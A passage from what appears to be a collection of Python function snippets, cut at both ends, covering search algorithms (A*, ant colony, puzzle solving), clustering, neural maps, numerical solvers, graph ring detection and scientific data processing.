linechange\n queue.append(path2)\n \n elif linechange <= explored[state]+changePunishment: # 考虑马上到终点\n \n explored[state] = linechange\n queue.append(path2)\n\n\n return total,getString(bestPathList,start,goal)", "def aestrella(inicio,obj):\n nodos_abiertos=[inicio]\n nodos_cerrados=[]\n lista1=[]\n for cel in nodos_abiertos:\n lista1.append(cel.costo)\n m=min(lista1)\n for j in nodos_abiertos:\n j.set_gscore(g(inicio,j))\n j.set_hscore(h(j,obj))\n j.set_fscore(f(inicio,obj))\n if j.fscore==m:\n if j==obj:\n print'terminado'\n nodos_cerrados.append(j)\n else:\n nodos_abiertos.append(j)\n for k in j.vecinos:\n if k in nodos_cerrados :\n gk=k.gscore\n gk1=k.get_gscore()\n if gk1<=gk:\n k.set_gscore=gk1\n j=k\n else:\n pass\n elif k in nodos_abiertos:\n gk=k.gscore\n gk1=k.get_gscore\n if gk1<=gk:\n k.set_gscore=gk1\n j=k\n else:\n pass\n \n else:\n nodos_abiertos.append(k)\n k.set_gscore()\n else:\n pass\n ruta=[] \n for u in nodos_cerrados:\n lnc=len(nodos_cerrados)\n for v in range(lnc):\n ruta.insert(v,nodos_cerrados[lnc-v])\n return ruta", "def cluster(self):\n\n result_nominatim = self.nominatim()\n try:\n coord = [(float( i['lat'] ), float( i['lon'] )) for i in result_nominatim]\n except:\n return None\n #print( \"coord\", coord )\n kms_per_radian = 6371.0088\n # Augmenter cette valeur augmente le nombre d'éléments dans un cluster et change les résultats\n epsilon = 2 / kms_per_radian\n # Adapter le nombre de clusters (min_sample) au nombre d'entités dans array ?\n db = DBSCAN( eps=epsilon, min_samples=1, algorithm='ball_tree',\n metric='haversine' ).fit( np.radians( coord ) )\n cluster_labels = db.labels_\n #print( \"cluster\", cluster_labels )\n num_clusters = len( set( cluster_labels ) )\n #print( \"num clusters\", num_clusters )\n counts = np.bincount( cluster_labels )\n #print( \"count\", counts )\n maxi = np.argmax( counts )\n #print( \"maxi\", maxi )\n itemindex = np.where( cluster_labels == maxi )[0]\n #print( \"itemindex\", itemindex )\n\n lat: List[float] = [float( result_nominatim[index]['lat'] ) for index in itemindex]\n lon: List[float] = [float( result_nominatim[index]['lon'] ) for index in itemindex]\n\n # on récupère la moyenne des coordonnées du plus gros cluster. Cette moyenne équivaut au centroide :\n # https://gis.stackexchange.com/questions/12120/calculate-midpoint-from-a-series-of-latitude-and-longitude-coordinates\n\n average = {\"lat\": sum( lat ) / len( lat ), \"lon\": sum( lon ) / len( lon )}\n\n #print( list( zip( cluster_labels, [x['display_name'] for x in results] ) ) )\n #print( \"plus proche de moyenne\", closest( results, average ) )\n return closest( result_nominatim, average )", "def zero_K(self):\n # print('zero_K axnode: ', self.cell.axnode)\n i = 0\n for node in self.cell.axnode:\n for seg in node:\n if i == 0:\n print(f\"KLT: {seg.klt.gbar:.6f} mho/cm2\")\n print(f\"KCNQ: {seg.kcnq.gbar:.6f} mho/cm2\")\n print(f\"KHT: {seg.kht.gbar:.6f} mho/cm2\")\n i = 1\n # seg.klt.gbar = 0e-3\n seg.kcnq.gbar = 0e-3\n # seg.kcnq.phi_m = seg.kcnq.phi_m - 20.\n # seg.kht.gbar = 0e-3\n # seg.kht.vshift = -20.\n pass", "def calculate_path(self):\n #Se repite el ciclo para el número especificado de veces\n for i in range(self.iterations):\n for ant in self.ants:\n ant.setup_ant()\n while not ant.final_node_reached:\n #Seleccion aleatoria del nodo a visitar\n node_to_vist = self.select_next_node(self.map.nodes_array[int(ant.actual_node[0])][int(ant.actual_node[1])])\n #Mover la hormiga al siguiente nodo seleccionado al azar\n ant.move_ant(node_to_visit)\n #Compruebe si se ha alcanzado la solución\n ant.is_final_node_reached()\n #Agregar la ruta resultante a la lista de rutas\n self.add_to_path_results(self.delete_loops(ant.get_visited_nodes()))\n # Habilitar a la hormiga para otra busqueda\n ant.enable_start_new_path()\n \n # Actualizar el nivel global de feromonas\n self.pheromone_update()\n self.best_result = self.paths[0]\n\n #Vaciar la lista de rutas\n self.empty_paths()\n print('Iteration: ', i, 'lenght of the path: ', len(self.best_result))\n return self.best_result", "def kohonen():\n# plb.close('all')\n \n dim = 28*28\n data_range = 255.0\n \n # load in data and labels \n data = np.array(np.loadtxt('data.txt'))\n labels = np.loadtxt('labels.txt')\n\n # select 4 digits \n name = \"Stettler\"\n targetdigits = name2digits(name) # assign the four digits that should be used\n print(targetdigits) # output the digits that were selected\n\n # this selects all data vectors that corresponds to one of the four digits\n data = data[np.logical_or.reduce([labels==x for x in targetdigits]),:]\n \n dy, dx = data.shape\n \n #set the size of the Kohonen map. In this case it will be 6 X 6\n size_k = 6\n \n #set the width of the neighborhood via the width of the gaussian that\n #describes it\n sigma = 2.0\n \n #initialise the centers randomly\n centers = np.random.rand(size_k**2, dim) * data_range\n \n #build a neighborhood matrix\n neighbor = np.arange(size_k**2).reshape((size_k, size_k))\n\n #set the learning rate\n eta = 0.9 # HERE YOU HAVE TO SET YOUR OWN LEARNING RATE\n \n #set the maximal iteration count\n tmax = 5000 # this might or might not work; use your own convergence criterion\n \n #set the random order in which the datapoints should be presented\n i_random = np.arange(tmax) % dy\n np.random.shuffle(i_random)\n \n for t, i in enumerate(i_random):\n som_step(centers, data[i,:],neighbor,eta,sigma)\n\n # for visualization, you can use this:\n for i in range(size_k**2):\n plb.subplot(size_k,size_k,i)\n \n plb.imshow(np.reshape(centers[i,:], [28, 28]),interpolation='bilinear')\n plb.axis('off')\n \n # leave the window open at the end of the loop\n plb.show()\n plb.draw()", "def _getscanind(self):\n \n zamin = self.za.min()\n first = np.where(self.za==zamin)[0]\n self.scan = np.zeros(self.spec.shape[0])\n if zamin < 0:\n cs = first[np.where((first - np.roll(first, 1)) != 1)[0]]\n ss = first[np.where((np.roll(first,-1) - first) != 1)[0]] + 1\n ce = ss \n se = np.roll((cs - 1) % self.za.size, -1) + 1\n for k, val in enumerate(cs):\n self.scan[val:se[k] + 1] = k\n else:\n moves = np.diff(self.za)\n max_ind = np.where(moves==moves.max())[0]\n turnover = self.za.size\n diffs = np.diff(max_ind)\n if np.unique(diffs).size > 1:\n raise ValueError, 'Can\\'t deal with non-uniform cal data yet.'\n if max_ind.size > 1:\n turnover = diffs[0]\n cs = ce = np.array([])\n ss = np.arange(self.za.size)[::turnover]\n se = np.roll((ss - 1) % self.za.size, -1)\n for k, val in enumerate(ss):\n self.scan[val:se[k] + 1] = k\n \n self.ind = {'cs': cs, 'ce': ce, 'ss': ss, 'se': se}\n self.nscan = np.unique(self.scan).size", "def find_best_k(data, anots, neibhours_range):\r\n \r\n best_k = 0\r\n best_acc = 0\r\n for n_neighbors in neibhours_range:\r\n accur = iterate_over_chanels(data, anots, n_neighbors)\r\n mean_acc = accur.mean()\r\n if mean_acc > best_acc:\r\n best_acc = mean_acc\r\n best_k = n_neighbors\r\n return best_k", "def question27():\n global conv_residuals\n def catch(r):\n \"\"\"Helper function to retrieve residual + steps to convergence for\n GMRES operation in Scipy. Used as a callback function for\n scipy.sparse.linalg.gmres\n \"\"\"\n global conv_residuals\n conv_residuals.append(r)\n return\n\n def iterate(rk):\n \"\"\" Preconditioner Function for GMRES.\"\"\"\n y = scipy.sparse.linalg.spsolve(P1, rk)\n RHS = scipy.sparse.csr_matrix.dot(P4, y) + rk\n zk = scipy.sparse.linalg.spsolve(P3, RHS)\n return zk\n\n\n N_search = np.array([20, 40, 60, 80, 100, 120, 140, 160, 180])\n steps_till_conv_N = np.zeros(N_search.size)\n\n fig271 = plt.figure(figsize=(13, 8))\n\n for i, n in enumerate(N_search):\n n2 = n**2\n A = construct_matrix_A(n)\n b = np.random.randn(n2)\n M, N = construct_M_N(n)\n mu_max = scipy.sparse.linalg.eigs(M, k=1, which='LM', return_eigenvectors=False)[0].real\n mu_min = scipy.sparse.linalg.eigs(M, k=1, which='SM', return_eigenvectors=False)[0].real\n gamma = np.sqrt(mu_max*mu_min)\n gammaI = scipy.sparse.diags((gamma,), (0,), shape=(n2, n2), format=\"csr\")\n P1 = gammaI + M\n P2 = gammaI - N\n P3 = gammaI + N\n P4 = gammaI - M\n M = scipy.sparse.linalg.LinearOperator((n2, n2), matvec=iterate)\n conv_residuals = []\n x = scipy.sparse.linalg.gmres(A, b, M=M, callback=catch)\n steps_till_conv_N[i] += len(conv_residuals)\n n_steps = len(conv_residuals)\n plt.semilogy(range(n_steps), conv_residuals, label=f\"N = {n}\")\n\n plt.xlabel(\"Steps Required for Convergence\")\n plt.ylabel(\"Residuals\")\n plt.title(\"Figure 271 - GMRES + Preconditioner Residuals for Varying N\", fontsize=13)\n plt.legend()\n plt.grid()\n plt.savefig(f\"figures/figure271.png\")\n plt.show()\n\n\n fig270 = plt.figure(figsize=(13, 8))\n plt.plot(N_search, steps_till_conv_N)\n plt.xlabel(\"N\")\n plt.ylabel(\"Steps until convergence\")\n plt.title(\"Figure 270 - GMRES + Preconditioner Convergence Required for Varying N\", fontsize=13)\n plt.grid()\n plt.savefig(f\"figures/figure270.png\")\n plt.show()\n return", "def resoudre(self):\n #crée la root du noeud\n #collections.deque est un conteneur comme une liste qui permet\n # des ajouts et des retraits rapides à chaque extremité\n queue = collections.deque([Node(self.start)])\n #vu représente les noeuds déjà croisés\n vu = set()\n vu.add(queue[0].state)\n while queue:\n #le noeud qui ressort dépend du score (h+g vu précédemment),\n queue = collections.deque(sorted(list(queue), key=lambda node: node.f))\n # on prend le score le plus faible pour se rapprocher du but avec un score de 0\n node = queue.popleft()\n #on vérifie s'il est égal à l'état du but c'est à dire le taquin = [1,2,3,4,5,6,7,8,0]\n if node.resolu:\n return node.chemin\n\n #si ce n'est pas l'état du but on regarde les différents noeuds enfants possibles\n # en faisant toutes les directions ( haut, bas, gauche, droite)\n for deplacement, action in node.actions:\n child = Node(deplacement(), node, action)\n\n if child.state not in vu:\n #on ajoute le noeud enfant à la queue\n queue.appendleft(child)\n vu.add(child.state)", "def line_search(self, Rs_grads, mu_grads, obj_init, r, eps):\n step = 1.\n\n while step > 1e-15:\n\n R_search = [np.clip(R + step*R_grad, 0., np.max(R))\n for (R_grad, R) in Rs_grads]\n mu_search = mu_grads[1] + step*mu_grads[0]\n r_search = mu_search + kron_mvp(R_search, eps)\n obj_search, kl_search, like_search = self.eval_obj(R_search, mu_search,\n r_search)\n if obj_init - obj_search > step:\n pos_def = True\n for R in R_search:\n if np.all(np.linalg.eigvals(R) > 0) == False:\n pos_def = False\n if pos_def:\n return R_search, mu_search, obj_search, step\n step = step * 0.5\n return None", "def findSubsetIndices(grdMODEL, min_lat, max_lat, min_lon, max_lon):\n\n\n if min_lon<0 and max_lon>0:\n splitExtract = True; Turns=2\n grdMODEL.splitExtract=splitExtract\n else:\n splitExtract = False; Turns=1\n grdMODEL.splitExtract=splitExtract\n grdMODEL.lon = np.where(grdMODEL.lon>180,grdMODEL.lon-360,grdMODEL.lon)\n \n # Array to store the results returned from the function\n res=np.zeros((Turns,4),dtype=np.float64)\n \n lats=grdMODEL.lat[:,0]\n lons=grdMODEL.lon[0,:]\n\n \n for k in range(Turns):\n\n if k==0 and splitExtract == True:\n minLon=min_lon; maxLon=0\n minLon=minLon+360\n maxLon=maxLon+360\n elif k==1 and splitExtract == True:\n minLon=0; maxLon=max_lon\n else:\n minLon=min_lon; maxLon=max_lon\n \n distances1 = []\n distances2 = []\n indices=[]\n index=1\n for point in lats:\n s1 = max_lat-point # (vector subtract)\n s2 = min_lat-point # (vector subtract)\n distances1.append((np.dot(s1, s1), point, index))\n distances2.append((np.dot(s2, s2), point, index-1))\n index=index+1\n\n distances1.sort()\n distances2.sort()\n indices.append(distances1[0])\n indices.append(distances2[0])\n \n distances1 = []\n distances2 = []\n index=1\n \n for point in lons:\n s1 = maxLon-point # (vector subtract)\n s2 = minLon-point # (vector subtract)\n distances1.append((np.dot(s1, s1), point, index))\n distances2.append((np.dot(s2, s2), point, index-1))\n index=index+1\n \n distances1.sort()\n distances2.sort()\n indices.append(distances1[0])\n indices.append(distances2[0])\n\n # Save final product: max_lat_indices,min_lat_indices,max_lon_indices,min_lon_indices\n minJ=indices[1][2]\n maxJ=indices[0][2]\n minI=indices[3][2]\n maxI=indices[2][2]\n \n res[k,0]=minI; res[k,1]=maxI; res[k,2]=minJ; res[k,3]=maxJ;\n\n # Save final product: max_lat_indices,min_lat_indices,max_lon_indices,min_lon_indices\n grdMODEL.indices=res", "def findRings(graph):\n # TODO add a planarity check?\n rings5 = []\n rings6 = []\n if DEBUG: print \"- starting ring detection...\"\n for head in graph.keys():\n tier1 = graph[head]\n tier2 = []\n tier3 = []\n # populate tier2 \n for node1 in tier1:\n for tmp in graph[node1]:\n if not tmp == head and not tmp in tier2 and (not tmp in tier1) :\n tier2.append(tmp)\n # populate tier3\n for node2 in tier2:\n for tmp in graph[node2]:\n if (not tmp == head) and (not tmp in tier2) and (not tmp in tier1) and (not tmp in tier3):\n tier3.append(tmp)\n # 6 member rings\n for x in tier3:\n candidate = []\n for c in tier2:\n if x in graph[c]:\n if not c in candidate:\n candidate.append(c)\n if len(candidate) >1:\n r6 = [ head ] \n r6.append(x)\n r6 += candidate\n for c in candidate:\n r6 += intersect( graph[head], graph[c])\n r6.sort()\n if not r6 in rings6:\n rings6.append( r6 )\n if DEBUG: print \" 6member!\", r6\n break\n # 5 member rings\n for c1 in tier2:\n for c2 in tier2:\n if not c1 == c2:\n if (c2 in graph[c1]) and (c1 in graph[c2]):\n is_3_ring = False\n for k in graph[c1]:\n if k in graph[c2]: \n is_3_ring =True\n if DEBUG: print \" [ ...catched a cycle_3... ]\"\n break\n if not is_3_ring :\n r5 = [ head ] \n r5.append(c1)\n r5.append(c2)\n r5 += intersect( graph[head], graph[c1])\n r5 += intersect( graph[head], graph[c2])\n r5.sort()\n if not r5 in rings5:\n if DEBUG: print \" 5member ring!\",r5\n rings5.append(r5)\n break\n return rings5, rings6", "def heuristique_ACPM(self,draw=False):\n\n def getVertricesOfPath(edges):\n set_node = set()\n for e in edges:\n id1,id2 = self.getIdVerticesOfEdge(e)\n set_node.add(id1)\n set_node.add(id2)\n return set_node\n\n\n if draw:\n try:\n os.makedirs(self.dirname+\"/H_ACPM\")\n except:\n pass\n\n\n #Graphe de depart contenant tout les noeuds\n G = Graphe_Individu(self,self.wholeGraphDict)\n if draw:\n self.drawGraph(\"/H_ACPM/G0\",G.get_graphe().get_edges())\n\n\n nb_vertices = 1\n nb_tmp_vertices = 0\n i=0\n\n #Tant que le nombre de noeuds du graphe decroit, appliquer kruskal\n while nb_vertices > nb_tmp_vertices :\n g_acpm = G.get_MST()\n\n\n nb_vertices = len(G.get_dictSteinerNodes())\n set_Node = set(G.get_dictSteinerNodes().keys())\n dictSteinerNodez = self.eliminationFeuilles(g_acpm.get_edges(),set_Node)\n G = Graphe_Individu(self,dictSteinerNodez)\n nb_tmp_vertices = len(dictSteinerNodez)\n\n if draw:\n i+= 1\n self.drawGraph(\"/H_ACPM/G%d\"%i+\"_%d\"%g_acpm.get_total_weight(),g_acpm.get_edges())\n\n\n if draw:\n self.drawGraph(\"/H_ACPM/GFinal_%d\"%G.get_MST().get_total_weight(),G.get_MST().get_edges())\n\n for i in self.steinerNodes:\n if i not in dictSteinerNodez.keys():\n dictSteinerNodez[i] = 0\n\n # return Graphe_Individu(self,dictSteinerNodez)\n return dictSteinerNodez", "def test_kruskal_wallis(self):\r\n d_control = [75, 67, 70, 75, 65, 71, 67, 67, 76, 68]\r\n d_2_gluc = [57, 58, 60, 59, 62, 60, 60, 57, 59, 61]\r\n d_2_fruc = [58, 61, 56, 58, 57, 56, 61, 60, 57, 58]\r\n d_1_1 = [58, 59, 58, 61, 57, 56, 58, 57, 57, 59]\r\n d_2_sucr = [62, 66, 65, 63, 64, 62, 65, 65, 62, 67]\r\n data = [d_control, d_2_gluc, d_2_fruc, d_1_1, d_2_sucr]\r\n kw_stat, pval = kruskal_wallis(data)\r\n self.assertFloatEqual(kw_stat, 38.436807439)\r\n self.assertFloatEqual(pval, 9.105424085598766e-08)\r\n # test using a random data set against scipy\r\n x_0 = array([0, 0, 0, 31, 12, 0, 25, 26, 775, 13])\r\n x_1 = array([14, 15, 0, 15, 12, 13])\r\n x_2 = array([0, 0, 0, 55, 92, 11, 11, 11, 555])\r\n # kruskal(x_0, x_1, x_2) = (0.10761259465923653, 0.94761564440615031)\r\n exp = (0.10761259465923653, 0.94761564440615031)\r\n obs = kruskal_wallis([x_0, x_1, x_2])\r\n self.assertFloatEqual(obs, exp)", "def auxmin_cc_piece(x,k_ind,m_ind):\n \n # Adding new linear function as a last function:\n # The first line. If jk = 1 and k_ind = nomax, this is a new line, otherwise an old one.\n line_start=cfg.nfea*sum(cfg.jk[i] for i in range(k_ind))\n #print line_start,cfg.jk,k_ind,cfg.nomax-1,cfg.jk[k_ind], cfg.xprev,x\n if cfg.jk[k_ind]==1 and k_ind==cfg.nomax-1:\n #print \"hihu0\"\n f_cc=np.dot(x[0:cfg.nfea-1],cfg.a[m_ind,:cfg.nfea-1])+x[cfg.nfea-1]\n cfg.min_line[k_ind,m_ind] = 0 # a global variable to save the smallest value.\n return f_cc\n else:\n #print \"hihu1\",line_start,k_ind\n f_cc=np.dot(cfg.xprev[line_start:line_start+(cfg.nfea-1)],cfg.a[m_ind,:cfg.nfea-1])+cfg.xprev[line_start+cfg.nfea-1]\n cfg.min_line[k_ind,m_ind] = 0 # a global variable to save the smallest value.\n if cfg.jk[k_ind]==1:\n return f_cc\n \n # Next lines\n line_start += cfg.nfea\n for j in range(1,cfg.jk[k_ind]-1): # Everything but the first and last.\n f_tmp = np.dot(cfg.xprev[line_start:line_start+(cfg.nfea-1)],cfg.a[m_ind,:cfg.nfea-1])+cfg.xprev[line_start+cfg.nfea-1]\n \n # Minimum of lines\n if f_tmp <= f_cc:\n f_cc = f_tmp\n cfg.min_line[k_ind,m_ind] = j\n line_start += cfg.nfea\n \n # The last line.\n if k_ind==cfg.nomax-1:\n #print \"hihu3\"\n f_tmp = np.dot(x[0:cfg.nfea-1],cfg.a[m_ind,:cfg.nfea-1])+x[cfg.nfea-1]\n else: \n \n f_tmp = np.dot(cfg.xprev[line_start:line_start+(cfg.nfea-1)],cfg.a[m_ind,:cfg.nfea-1])+cfg.xprev[line_start+cfg.nfea-1]\n \n # Minimum of lines\n if f_tmp <= f_cc:\n f_cc = f_tmp\n cfg.min_line[k_ind,m_ind] = cfg.jk[k_ind]-1 \n\n return f_cc", "def MCS(n,k):\n\tglobal dict_all\n\tdict_val=copy.deepcopy(dict_all)\n\t#start_time = time.time()\n\tfinal = {}\t\t\t\t\t # Store all result with the count as key. For example final[1]=[[1,0,0],[0,1,1]]\n\tseq = []\t\t\t\t\t\t# Store the count with no duplication\n\tfor i in range(n):\n\t\tleaf={}\t\t\t\t\t\t# leaf is the dictionary to store the random value of each leaf\n\t\t#count=0\n\t\tfor i in leaves:\n\t\t\tleaf[i] = choice([0,1])\n\t\t\tdict_val[i]=leaf[i]\n\t\t\t#count += leaf[i]\n\t\tresult = Cal_FT(dict_val)\t\n\t\t'''\n\t\tif result:\n\t\t\tcutset = []\n\t\t\tfor i in leaves:\n\t\t\t\tcutset.append(str(leaf[i]))\n\t\t\tcutset=\"\".join(cutset)\n\t\t\tif cutset not in final:\n\t\t\t\tfinal[cutset]=count\n\tfinal_sorted=sorted(zip(final.values(),final.keys())) \t\t\t\t#Order the cutset by its count\n\tfor i in range(k):\t\t\t\t\t\t\t\t\t\t\t\t\t#Print the first k result\n\t\tcutset=list(final_sorted[i][1])\n\t\tresult=[]\n\t\tfor index in range(len(cutset)):\n\t\t\tif cutset[index] is \"1\":\n\t\t\t\tresult.append(leaves[index])\n\t\tprint result\n\t#end_time=time.time()\n\t#print \"Running time is\", end_time-start_time\n\t'''", "def naive_consensus_search(Ts, m):\n k = len(Ts)\n\n bsf_radius = np.inf\n bsf_Ts_idx = 0\n bsf_subseq_idx = 0\n\n for j in range(k):\n radii = np.zeros(len(Ts[j]) - m + 1)\n for i in range(k):\n if i != j:\n mp = naive.stump(Ts[j], m, Ts[i])\n radii = np.maximum(radii, mp[:, 0])\n min_radius_idx = np.argmin(radii)\n min_radius = radii[min_radius_idx]\n if min_radius < bsf_radius:\n bsf_radius = min_radius\n bsf_Ts_idx = j\n bsf_subseq_idx = min_radius_idx\n\n return bsf_radius, bsf_Ts_idx, bsf_subseq_idx", "def search(self) -> int:\n # crete node list\n for x in range(self.n):\n for y in range(self.n):\n if not self.grid[y][x] == 0:\n self.all_nodes.append((x, y))\n # recursively create paths\n i = 0\n paths = [[(0, 0)]]\n while i < self.n * self.n:\n paths = self.generate_paths(paths)\n if isinstance(paths, int):\n return paths\n i += 1\n\n return -1", "def challenge2(self):\n # Let's try an octree-type approach\n # For each grid cube we should be able to find whether a nanobot:\n # 1) is not in range (is outside grid cube and not in range of nearest face)\n # 2) is in range of whole cube (all 8 corners are in range)\n # 3) is in range of part of the cube (i.e. not 1 or 2)\n # Root node: figure out extent of whole space\n mins = []\n maxs = []\n for axis in range(3):\n mins.append(min(self.nanobots, key=lambda n: n.coord[axis]).coord[axis])\n maxs.append(max(self.nanobots, key=lambda n: n.coord[axis]).coord[axis])\n\n for count in range(len(self.nanobots), 0, -1):\n results = self.search_coord_with_max_nanobots(mins, maxs, [], self.nanobots, count)\n if results and results[0].count >= count:\n break\n\n print(f\"Found {len(results)} octree search results with {results[0].count} nanobots in range.\")\n\n # Find result coord closest to origin\n closest_dist = np.iinfo(np.int32).max\n best_coord = None\n for result in results:\n for corner in itertools.product(*zip(result.mins, result.maxs)):\n d = manhattan_dist(corner, (0, 0, 0))\n if d < closest_dist:\n closest_dist = d\n best_coord = corner\n\n print(f\"Best coord: {best_coord} (dist={manhattan_dist(best_coord, (0, 0, 0))})\")", "def spatial_planner():\n from scipy.spatial import KDTree\n # KDTree", "def eg_sk():\n\n rxs = []\n a = []\n b = []\n c = []\n d = []\n e = []\n f = []\n g = []\n h = []\n i = []\n j = []\n\n for _ in range(1000):\n a.append(utils.gaussian(10, 1))\n\n for _ in range(1000):\n b.append(utils.gaussian(10.1, 1))\n\n for _ in range(1000):\n c.append(utils.gaussian(20, 1))\n\n for _ in range(1000):\n d.append(utils.gaussian(30, 1))\n\n for _ in range(1000):\n e.append(utils.gaussian(30.1, 1))\n\n for _ in range(1000):\n f.append(utils.gaussian(10, 1))\n\n for _ in range(1000):\n g.append(utils.gaussian(10, 1))\n\n for _ in range(1000):\n h.append(utils.gaussian(40, 1))\n\n for _ in range(1000):\n i.append(utils.gaussian(40, 3))\n\n for _ in range(1000):\n j.append(utils.gaussian(10, 1))\n\n for k, v in enumerate([a, b, c, d, e, f, g, h, i, j]):\n rxs.append(creation.RX(v, \"rx{}\".format(k)))\n\n for rx in stats.tiles(stats.scottKnot(rxs)):\n print(\"\", rx[\"rank\"], rx[\"name\"], rx[\"show\"], sep=\"\\t\")", "def min_span_tree(adjacency_matrix, indices_to_connect):\n\n if len(indices_to_connect) > 1:\n Root = indices_to_connect[0]\n M = Prim(adjacency_matrix, Root)\n adjacency_matrix, W, Path, Degree, TreeNbr = M.mst_prim(adjacency_matrix,\n [Root], [], M.degree, M.tree_nbr)\n\n return W, Path, Degree, TreeNbr", "def partition(data, s, b, u, res, points, size, depth):\r\n\t# depth is just for demonstration purposes, terminating the recursion early\r\n\t\r\n\t# termination conditions\r\n\tif size > 1 and depth > 0:\r\n\r\n\t\t# variables that keep track of the scope of \"points\" for iteration purposes\r\n\t\trlen = []\r\n\t\tclen = len(points)\r\n\t\tfor i in range(clen):\r\n\t\t\trlen.append(len(points[i]))\r\n\t\t\r\n\t\t# keeps track of which point defines the maximal set\r\n\t\tmax = -10000\r\n\t\tmax_index = [0,0]\r\n\r\n\t\t# each point on the grid defines a potentially maximal set (including that point and the best \r\n\t\t# choice for higher rows) s[x][y] tracks the value of the set defined by (x, y)\r\n\t\tfor i in range(len(points)):\r\n\t\t\t# calculating s based on current row\r\n\t\t\ts[points[i][rlen[i]-1][0]][points[i][rlen[i]-1][1]] = data[points[i][rlen[i]-1][0]][points[i][rlen[i]-1][1]]\r\n\t\t\tfor j in range(rlen[i] - 2, -1, -1):\r\n\t\t\t\ts[points[i][j][0]][points[i][j][1]] = s[points[i][j + 1][0]][points[i][j + 1][1]] + data[points[i][j][0]][points[i][j][1]]\r\n\t\t\t\r\n\t\t\t# if below the first row, factoring in the optimal set from above rows\r\n\t\t\tif i != 0:\r\n\t\t\t\tprev_end = points[i-1][rlen[i-1]-1]\r\n\t\t\t\tfor j in range(rlen[i]):\r\n\t\t\t\t\tu[points[i][j][0]][points[i][j][1]] = b[prev_end[0]][np.minimum(prev_end[1], points[i][j][1])]\r\n\t\t\t\t\ts[points[i][j][0]][points[i][j][1]] += s[prev_end[0]][u[points[i][j][0]][points[i][j][1]]]\r\n\t\t\t\r\n\t\t\t# keeping track of the best sets from the new row for later use (what b and u are for)\r\n\t\t\trow_max = -10000\r\n\t\t\trow_max_index = -1\r\n\t\t\tfor j in range(rlen[i]):\r\n\t\t\t\tcurr = s[points[i][j][0]][points[i][j][1]]\r\n\t\t\t\tif curr > row_max:\r\n\t\t\t\t\trow_max = curr\r\n\t\t\t\t\trow_max_index = points[i][j][1]\r\n\t\t\t\tb[points[i][j][0]][points[i][j][1]] = row_max_index\r\n\r\n\t\t\t# updating the global optimal set\r\n\t\t\tif row_max > max:\r\n\t\t\t\tmax = row_max\r\n\t\t\t\tmax_index[0] = i\r\n\t\t\t\tmax_index[1] = row_max_index\r\n\t\t\r\n\t\t# finding the set of points that generated the global optimum\r\n\t\tpointers = []\r\n\t\tpointers.append(max_index[1])\r\n\t\tfor i in range(max_index[0], 0, -1):\r\n\t\t\tpointers.append(u[points[i][0][0]][pointers[max_index[0]-i]])\r\n\t\tpointers = np.flip(pointers, axis=0)\r\n\t\t\r\n\t\t# finding the set of points of the upper and lower partitions defined by the optimal set\r\n\t\tupper_points = []\r\n\t\tlower_points = []\r\n\t\tup_num = 0\r\n\t\tlow_num = 0\r\n\t\tfor i in range(clen):\r\n\t\t\turow = []\r\n\t\t\tlrow = []\r\n\t\t\tfor j in range(rlen[i]):\r\n\t\t\t\tif i <= max_index[0] and points[i][j][1] >= pointers[i]:\r\n\t\t\t\t\turow.append(points[i][j])\r\n\t\t\t\t\tup_num += 1\r\n\t\t\t\telse:\r\n\t\t\t\t\tlrow.append(points[i][j])\r\n\t\t\t\t\tlow_num += 1\r\n\t\t\tif len(urow) > 0:\r\n\t\t\t\tupper_points.append(tuple(urow))\r\n\t\t\tif len(lrow) > 0:\r\n\t\t\t\tlower_points.append(tuple(lrow))\r\n\r\n\t\t# updating the final result and prepping the new datasets to have mean 0\r\n\t\tfor i in range(len(upper_points)):\r\n\t\t\tfor j in range(len(upper_points[i])):\r\n\t\t\t\tres[upper_points[i][j][0]][upper_points[i][j][1]] += max/up_num\r\n\t\t\t\tdata[upper_points[i][j][0]][upper_points[i][j][1]] -= max/up_num\r\n\t\tfor i in range(len(lower_points)):\r\n\t\t\tfor j in range(len(lower_points[i])):\r\n\t\t\t\tres[lower_points[i][j][0]][lower_points[i][j][1]] -= max/low_num\r\n\t\t\t\tdata[lower_points[i][j][0]][lower_points[i][j][1]] += max/low_num\r\n\t\t\r\n\t\t# recursion (if the optimal set is the current one, stop since at this point \r\n\t\t# the mean of the selected elements is optimal over them)\r\n\t\tif up_num != size:\r\n\t\t\tpartition(data, s, b, u, res, upper_points, up_num, depth-1)\r\n\t\tif low_num != size:\r\n\t\t\tpartition(data, s, b, u, res, lower_points, low_num, depth-1)\r\n\telse:\r\n\t\treturn", "def _single_pass_optimize(self, best_centre_inds, best_score, min_to_cluster, nbrs):\n def score_inds(vals):\n inds, ind = vals\n other_best_inds.append(ind)\n score = np.sum(np.min(self.orig_dists[np.ix_(inds,other_best_inds)], axis=1))\n other_best_inds.pop()\n return (score, ind)\n #dists = self.orig_dists.copy() If I zero out rows I don't need, I don't have to use ix_() which is 2x as fast. Probably doesn't matter, fast enough.\n best_centre_inds = best_centre_inds[::]\n inds_to_try = list(nbrs)\n for i in range(len(best_centre_inds)):\n other_best_inds = best_centre_inds[:i] + best_centre_inds[i+1:]\n cur_covered_set = set().union(*(nbrs[ind] for ind in other_best_inds))\n cvrd_inds = [list(cur_covered_set | nbrs[ind]) for ind in inds_to_try]\n valid_cvrd_inds = [(inds, ind) for inds, ind in zip(cvrd_inds, inds_to_try) if len(inds) >= min_to_cluster]\n score_vals = map(score_inds, valid_cvrd_inds)\n best_score, best_ind = min(score_vals)\n best_centre_inds[i] = best_ind\n return best_centre_inds", "def main(datafilepath):\n #create midline\n sectionsize = 10000\n TrackData = TrackMaker(sectionsize) # 10000\n moving_window = sectionsize*2\n midline = TrackData[0] \n sections = TrackData[2]\n #midline = midline[sections[0]:sections[5],:] #only work with the midline of the trial \n #steergaze_df = pd.read_feather(datafilepath)\n steergaze_df = pd.read_csv(datafilepath, sep=',',header=0)\n #steergaze_df.reset_index()\n master_steergaze = pd.DataFrame()\n datafolder = os.path.split(datafilepath)[0] \n\n #TODO: due to grouping the future path cuts - off at end of slalom, use the continuous trajectory across roadsections for fp mapping\n\n #modes taken from gaze_through_midline_densities.py\n entry = find_closest_index(midline, [-23, 69])\n firstobject = find_closest_index(midline, [25, 52])\n gazemodes = [entry, firstobject]\n\n mid_diff = np.linalg.norm(np.diff(midline, axis=0, prepend = np.array([[0,0]])), axis = 1)\n midline_dist_array = np.cumsum(mid_diff)\n\n tree = spatial.cKDTree(midline)\n\n #for trial in picked_trials:\t\n for block, blockdata in steergaze_df.groupby(['ID','block']):\n\n print(block)\n begin = timer()\n\n\n blockdata = blockdata.copy()\n blockdata.sort_values('currtime', inplace=True)\n # blockdata.reset_index()\n\n ####pick target\n \"\"\"\n condition = 